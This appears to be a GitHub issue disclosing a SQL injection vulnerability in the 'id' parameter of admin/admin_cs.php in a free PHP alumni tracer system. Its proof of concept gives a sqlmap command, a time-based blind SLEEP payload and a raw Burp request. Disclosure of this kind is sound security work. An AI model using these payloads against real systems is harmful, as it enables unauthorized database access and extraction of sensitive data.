You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
Vulnerability Details
Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0
Vulnerable File: admin/admin_cs.php
Parameter Names: id
Attack Type: Remote
Description
zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
Proof of Concept (PoC) :
sqlmap -u "www.tracking.com:8098/admin/admin_cs.php?id=1" -p id --dbms=mysql -v 3
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(5)))ansi) AND 'Pxda'='Pxda
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Burp Suite (POC):
GET /admin/admin_cs.php?id=id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(10)))ansi) AND 'Pxda'='Pxda HTTP/1.1
Host: www.tracking.com:8098
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
The text was updated successfully, but these errors were encountered:
xuanluansec
changed the title
Online Chatting System using PHP/MySQL V1.0 admin/admin_cs.php - SQL injection vulnerability
Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability
Mar 28, 2024
Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability
Vendor Homepage
Software Link
Overview
Vulnerability Details
Description
Proof of Concept (PoC) :
sqlmap -u "www.tracking.com:8098/admin/admin_cs.php?id=1" -p id --dbms=mysql -v 3
Burp Suite (POC):
The text was updated successfully, but these errors were encountered: